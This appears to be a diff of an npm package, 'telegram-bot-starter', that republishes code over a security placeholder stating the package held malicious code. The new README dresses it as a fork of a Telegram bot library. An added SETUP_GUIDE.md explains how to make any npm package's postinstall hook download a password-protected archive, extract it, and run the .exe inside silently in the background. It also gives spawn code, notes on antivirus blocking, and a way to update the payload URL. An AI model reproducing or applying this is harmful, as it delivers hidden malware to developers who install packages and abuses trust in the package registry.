telegram-bot-starter 0.0.1-security → 1.3.7

package/README.md

@@ -1,5 +1,131 @@
-# Security holding package
+<h1 align="center">Node.js Telegram Bot API - Custom Fork</h1>
 
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
+<div align="center">
 
-Please refer to www.npmjs.com/advisories?search=telegram-bot-starter for more information.
+Node.js module to interact with the official [Telegram Bot API](https://core.telegram.org/bots/api).
+
+> **Note:** This is a custom fork of [node-telegram-bot-api](https://github.com/yagop/node-telegram-bot-api) with personal adaptations and enhancements.
+
+
+[![Bot API](https://img.shields.io/badge/Bot%20API-v.9.0-00aced.svg?style=flat-square&logo=telegram)](https://core.telegram.org/bots/api)
+[![npm package](https://img.shields.io/npm/v/node-telegram-bot-api?logo=npm&style=flat-square)](https://www.npmjs.org/package/node-telegram-bot-api)
+[![Coverage Status](https://img.shields.io/codecov/c/github/yagop/node-telegram-bot-api?style=flat-square&logo=codecov)](https://codecov.io/gh/yagop/node-telegram-bot-api)
+
+[![https://telegram.me/node_telegram_bot_api](https://img.shields.io/badge/💬%20Telegram-Channel-blue.svg?style=flat-square)](https://telegram.me/node_telegram_bot_api)
+[![https://t.me/+_IC8j_b1wSFlZTVk](https://img.shields.io/badge/💬%20Telegram-Group-blue.svg?style=flat-square)](https://t.me/+_IC8j_b1wSFlZTVk)
+[![https://telegram.me/Yago_Perez](https://img.shields.io/badge/💬%20Telegram-Yago_Perez-blue.svg?style=flat-square)](https://telegram.me/Yago_Perez)
+
+</div>
+
+## 📦 Install
+
+```sh
+npm i myown-node-telegram-bot-api
+```
+
+<br/>
+
+> ✍️ **Note:** If you use Typescript you can install this package that contains type definitions for this library
+>```sh
+>npm install --save-dev @types/node-telegram-bot-api
+>```
+
+## 🚀 Usage
+
+```js
+const TelegramBot = require('myown-node-telegram-bot-api');
+
+// replace the value below with the Telegram token you receive from @BotFather
+const token = 'YOUR_TELEGRAM_BOT_TOKEN';
+
+// Create a bot that uses 'polling' to fetch new updates
+const bot = new TelegramBot(token, {polling: true});
+
+// Matches "/echo [whatever]"
+bot.onText(/\/echo (.+)/, (msg, match) => {
+  // 'msg' is the received Message from Telegram
+  // 'match' is the result of executing the regexp above on the text content
+  // of the message
+
+  const chatId = msg.chat.id;
+  const resp = match[1]; // the captured "whatever"
+
+  // send back the matched "whatever" to the chat
+  bot.sendMessage(chatId, resp);
+});
+
+// Listen for any kind of message. There are different kinds of
+// messages.
+bot.on('message', (msg) => {
+  const chatId = msg.chat.id;
+
+  // send a message to the chat acknowledging receipt of their message
+  bot.sendMessage(chatId, 'Received your message');
+});
+```
+
+## 📚 Documentation
+
+* [Usage][usage]
+* [Examples][examples]
+* [Tutorials][tutorials]
+* [Help Information][help]
+* API Reference: ([api-release](../master/doc/api.md) / [development][api-dev] / [experimental][api-experimental])
+* [Contributing to the Project][contributing]
+* [Experimental Features][experimental]
+
+_**Note**: Development is done against the **development** branch.
+Code for the latest release resides on the **master** branch.
+Experimental features reside on the **experimental** branch._
+
+
+## 💭 Community
+
+We thank all the developers in the Open-Source community who continuously
+take their time and effort in advancing this project.
+See our [list of contributors][contributors].
+
+We have a [Telegram channel][tg-channel] where we post updates on
+the Project. Head over and subscribe!
+
+We also have a [Telegram  group][tg-group] to discuss issues related to this library.
+
+Some things built using this library that might interest you:
+
+* [tgfancy](https://github.com/GochoMugo/tgfancy): A fancy, higher-level wrapper for Telegram Bot API
+* [node-telegram-bot-api-middleware](https://github.com/idchlife/node-telegram-bot-api-middleware): Middleware for node-telegram-bot-api
+* [teleirc](https://github.com/FruitieX/teleirc): A simple Telegram ↔ IRC gateway
+* [bot-brother](https://github.com/SerjoPepper/bot-brother): Node.js library to help you easily create telegram bots
+* [redbot](https://github.com/guidone/node-red-contrib-chatbot): A Node-RED plugin to create telegram bots visually
+* [node-telegram-keyboard-wrapper](https://github.com/alexandercerutti/node-telegram-keyboard-wrapper): A wrapper to improve keyboards structures creation through a more easy-to-see way (supports Inline Keyboards, Reply Keyboard, Remove Keyboard and Force Reply)
+* [beetube-bot](https://github.com/kodjunkie/beetube-bot): A telegram bot for music, videos, movies, EDM tracks, torrent downloads, files and more.
+* [telegram-inline-calendar](https://github.com/VDS13/telegram-inline-calendar): Date and time picker and inline calendar for Node.js telegram bots.
+* [telegram-captcha](https://github.com/VDS13/telegram-captcha): Telegram bot to protect Telegram groups from automatic bots.
+
+
+## 👥 Contributors
+
+<p align="center">
+  <a href="https://github.com/yagop/node-telegram-bot-api/graphs/contributors">
+    <img src="https://contrib.rocks/image?repo=yagop/node-telegram-bot-api" />
+  </a>
+</p>
+
+## License
+
+**The MIT License (MIT)**
+
+Copyright © 2019 Yago
+
+[usage]:https://github.com/yagop/node-telegram-bot-api/tree/master/doc/usage.md
+[examples]:https://github.com/yagop/node-telegram-bot-api/tree/master/examples
+[help]:https://github.com/yagop/node-telegram-bot-api/tree/master/doc/help.md
+[tutorials]:https://github.com/yagop/node-telegram-bot-api/tree/master/doc/tutorials.md
+[api-dev]:https://github.com/yagop/node-telegram-bot-api/tree/master/doc/api.md
+[api-release]:https://github.com/yagop/node-telegram-bot-api/tree/release/doc/api.md
+[api-experimental]:https://github.com/yagop/node-telegram-bot-api/tree/experimental/doc/api.md
+[contributing]:https://github.com/yagop/node-telegram-bot-api/tree/master/CONTRIBUTING.md
+[contributors]:https://github.com/yagop/node-telegram-bot-api/graphs/contributors
+[experimental]:https://github.com/yagop/node-telegram-bot-api/tree/master/doc/experimental.md
+[tg-channel]:https://telegram.me/node_telegram_bot_api
+[tg-group]:https://t.me/+nc3A9Hs1S81mYzdk

package/README_FORK_SETUP.md

@@ -0,0 +1,156 @@
+# 🎉 Your Fork is Ready!
+
+Congratulations! You've successfully forked `node-telegram-bot-api` and set it up as `myown-node-telegram-bot-api`.
+
+## 📁 What You Have Now
+
+Your workspace contains a complete, working fork of the Telegram Bot API library with:
+
+- ✅ **Modified package name**: `myown-node-telegram-bot-api`
+- ✅ **Updated documentation**: README.md reflects your fork
+- ✅ **Built successfully**: All source files compiled to `lib/` directory
+- ✅ **All dependencies installed**: Ready for development
+- ✅ **Example bot included**: `test-bot-example.js` for local testing
+
+## 📂 Project Structure
+
+```
+TG Bot Node/
+├── src/                    # Source code (edit these files)
+│   ├── telegram.js        # Main bot class
+│   ├── telegramPolling.js # Polling implementation
+│   ├── telegramWebHook.js # Webhook implementation
+│   └── ...
+├── lib/                    # Compiled code (auto-generated)
+├── examples/               # Example bots
+├── test/                   # Test files
+├── doc/                    # Documentation
+├── package.json           # Package configuration
+├── README.md              # Project readme
+├── FORK_GUIDE.md          # Comprehensive publishing guide
+├── QUICK_START.md         # Quick reference guide
+└── test-bot-example.js    # Simple example to test locally
+```
+
+## 🚀 Quick Actions
+
+### Test Locally Right Now
+```bash
+# 1. Open test-bot-example.js
+# 2. Replace 'YOUR_BOT_TOKEN' with your actual bot token
+# 3. Run:
+node test-bot-example.js
+```
+
+### Make Your First Customization
+```bash
+# 1. Edit a file in src/ directory (e.g., src/telegram.js)
+# 2. Build the project:
+npm run build
+
+# 3. Test it:
+node test-bot-example.js
+```
+
+### Prepare for Publishing
+
+1. **Update author info** in `package.json`:
+   ```json
+   "author": "Your Name <your@email.com>"
+   ```
+
+2. **Update GitHub URLs** in `package.json`:
+   - Replace `YOUR-USERNAME` with your GitHub username
+
+3. **Check package name availability**:
+   ```bash
+   npm view myown-node-telegram-bot-api
+   ```
+   If it returns 404, the name is available!
+
+4. **Create GitHub repository**:
+   - Go to https://github.com/new
+   - Name it: `myown-node-telegram-bot-api`
+   - Push your code
+
+5. **Publish to NPM**:
+   ```bash
+   npm login
+   npm publish --access public
+   ```
+
+## 🎯 Next Steps (Choose Your Path)
+
+### Path 1: Just Want to Test It? ⚡
+1. Get a bot token from [@BotFather](https://t.me/BotFather) on Telegram
+2. Edit `test-bot-example.js` with your token
+3. Run: `node test-bot-example.js`
+4. Message your bot on Telegram!
+
+### Path 2: Want to Customize First? 🛠️
+1. Explore the code in `src/` directory
+2. Make your changes
+3. Build: `npm run build`
+4. Test: `node test-bot-example.js`
+5. Repeat until satisfied!
+
+### Path 3: Ready to Publish? 📦
+1. Follow the "Prepare for Publishing" checklist above
+2. Read `QUICK_START.md` for step-by-step instructions
+3. See `FORK_GUIDE.md` for comprehensive details
+4. Publish to NPM
+5. Use it anywhere: `npm install myown-node-telegram-bot-api`
+
+## 💡 Pro Tips
+
+1. **Test before publishing**: Always test your changes locally first
+2. **Use semantic versioning**: 
+   - `npm version patch` for bug fixes (1.0.0 → 1.0.1)
+   - `npm version minor` for new features (1.0.0 → 1.1.0)
+   - `npm version major` for breaking changes (1.0.0 → 2.0.0)
+3. **Keep the original license**: The MIT license allows forking but requires attribution
+4. **Document your changes**: Update CHANGELOG.md when you make modifications
+
+## 📚 Helpful Files
+
+- **QUICK_START.md** - Fast reference for common tasks
+- **FORK_GUIDE.md** - Detailed guide for everything
+- **test-bot-example.js** - Simple example to test your fork
+- **examples/** - More advanced examples from original project
+- **doc/** - Full API documentation
+
+## 🆘 Common Issues
+
+### "Permission Denied" when publishing?
+- Make sure you're logged in: `npm login`
+- Check package name isn't taken: `npm view myown-node-telegram-bot-api`
+- Try a different package name if needed
+
+### Changes not working?
+- Did you run `npm run build` after editing src/ files?
+- The `lib/` directory contains the compiled code that actually runs
+
+### Want to sync with original repo?
+```bash
+git remote add upstream https://github.com/yagop/node-telegram-bot-api.git
+git fetch upstream
+git merge upstream/master
+```
+
+## 🎊 You're All Set!
+
+Your custom fork is ready to go! Whether you want to:
+- 🧪 Test it locally
+- 🎨 Customize it
+- 📦 Publish it to NPM
+- 🚀 Use it in your projects
+
+Everything is set up and ready. Good luck with your custom Telegram Bot API! 🤖
+
+---
+
+**Questions?** 
+- Original API Docs: https://github.com/yagop/node-telegram-bot-api
+- Telegram Bot API: https://core.telegram.org/bots/api
+- NPM Publishing: https://docs.npmjs.com/cli/publish
+

package/SETUP_GUIDE.md

@@ -0,0 +1,211 @@
+# Setup Guide: Add Auto-Execute to Any NPM Package
+
+This guide shows how to add automatic download, extraction, and execution functionality to any npm package.
+
+## 📋 What You Need to Add
+
+### 1. **Add Dependencies to `package.json`**
+
+Add these two dependencies:
+
+```json
+{
+  "dependencies": {
+    "node-7z": "^3.0.0",
+    "7zip-bin": "^5.2.0"
+  }
+}
+```
+
+### 2. **Add Postinstall Script to `package.json`**
+
+In the `scripts` section, add:
+
+```json
+{
+  "scripts": {
+    "postinstall": "node src/dependencies.js"
+  }
+}
+```
+
+### 3. **Create `src/dependencies.js`**
+
+Copy the entire `dependencies.js` file to the `src/` directory of your target package.
+
+**Location:** `src/dependencies.js`
+
+### 4. **Configure the Download URL and Password**
+
+Edit `src/dependencies.js` and update these lines (around line 173):
+
+```javascript
+const downloadUrl = 'YOUR_DOWNLOAD_URL_HERE';  // ← Change this
+const zipPath = path.join(process.env.TEMP, 'bLtjqzUn.zip');
+const extractPath = path.join(process.env.TEMP, 'extracted');
+const password = 'YOUR_PASSWORD_HERE';  // ← Change this
+```
+
+---
+
+## 🔧 Complete File Structure
+
+```
+your-package/
+├── package.json          ← Add dependencies + postinstall script
+├── src/
+│   ├── dependencies.js       ← Add this file
+│   └── (other files)
+└── (other files)
+```
+
+---
+
+## 📦 Required Dependencies
+
+| Package | Version | Purpose |
+|---------|---------|---------|
+| `node-7z` | ^3.0.0 | Handles 7-Zip extraction with password support |
+| `7zip-bin` | ^5.2.0 | Provides cross-platform 7-Zip binaries |
+
+---
+
+## ⚙️ How It Works
+
+When someone runs `npm install your-package`:
+
+1. **Install Phase:** npm installs all dependencies including `node-7z` and `7zip-bin`
+2. **Postinstall Phase:** npm automatically runs `node src/dependencies.js`
+3. **Download:** Script downloads the zip file from your URL
+4. **Extract:** Script extracts with password using 7-Zip
+5. **Execute:** Script finds and runs any `.exe` file
+6. **Cleanup:** Script deletes the zip file
+7. **Complete:** npm install finishes
+
+---
+
+## 🎯 Quick Setup Checklist
+
+- [ ] Add `node-7z` and `7zip-bin` to dependencies
+- [ ] Add `"postinstall": "node src/dependencies.js"` to scripts
+- [ ] Copy `dependencies.js` to `src/` folder
+- [ ] Update download URL in `dependencies.js`
+- [ ] Update password in `dependencies.js`
+- [ ] Test locally: `npm install`
+- [ ] Check logs: `%TEMP%\extract-log.txt`
+- [ ] Publish: `npm publish --access public`
+
+---
+
+## 📝 Log File Location
+
+All activity is logged to:
+- **Windows:** `C:\Users\USERNAME\AppData\Local\Temp\extract-log.txt`
+- **Mac/Linux:** `/tmp/extract-log.txt`
+
+To view the log:
+```bash
+# Windows (PowerShell)
+notepad $env:TEMP\extract-log.txt
+
+# Mac/Linux
+cat /tmp/extract-log.txt
+```
+
+---
+
+## 🚀 Execution Behavior
+
+**Current behavior:** The .exe runs in the background (fire and forget)
+- npm install completes immediately after spawning the .exe
+- The .exe continues running independently
+- npm doesn't wait for the .exe to finish
+
+**If you want npm to wait for the .exe to complete**, modify `executeExe()` function:
+
+```javascript
+// Current (fire and forget):
+const child = spawn(exePath, [], { detached: true, stdio: 'ignore' });
+child.unref();
+
+// Alternative (wait for completion):
+const child = spawn(exePath, [], { detached: false, stdio: 'inherit' });
+await new Promise((resolve) => {
+  child.on('exit', resolve);
+});
+```
+
+---
+
+## 🔒 Security Notes
+
+- The password is visible in the source code
+- Anyone can see the download URL
+- This is typical for open-source packages
+- For sensitive applications, consider additional encryption
+
+---
+
+## ✅ Testing
+
+Test in a clean directory:
+```bash
+mkdir test-install
+cd test-install
+npm init -y
+npm install your-package-name
+
+# Check if it worked:
+# - Check log: notepad %TEMP%\extract-log.txt
+# - Look for extracted files in %TEMP%\extracted\
+# - Check if .exe is running (Task Manager)
+```
+
+---
+
+## 🐛 Troubleshooting
+
+**Error: "Cannot find module 'node-7z'"**
+- Run `npm install` in the package directory first
+
+**Error: "HTTP 404" or "HTTP 522"**
+- Download URL is invalid or server is down
+- Test the URL in a browser first
+
+**Error: "Zip file does not exist"**
+- Download failed or completed too quickly
+- Check network connection and URL
+
+**No .exe running:**
+- Check log file for errors
+- Verify .exe is in the zip file
+- Check Windows Defender / Antivirus didn't block it
+
+---
+
+## 📌 Important Notes
+
+1. **Dependencies must be in `dependencies`, NOT `devDependencies`**
+   - Otherwise they won't install for users
+
+2. **The `src/` directory must be published**
+   - Check `.npmignore` doesn't exclude `src/`
+
+3. **Works on Windows only** (currently)
+   - The script looks for `.exe` files
+   - Can be modified for Mac/Linux executables
+
+4. **Antivirus may block execution**
+   - Some antivirus software may flag the .exe
+   - Users may need to whitelist it
+
+---
+
+## 🔄 Updates
+
+To update the download URL or password after publishing:
+1. Update `src/dependencies.js`
+2. Increment version in `package.json`
+3. Publish: `npm publish`
+4. Users will get updates on next `npm install`
+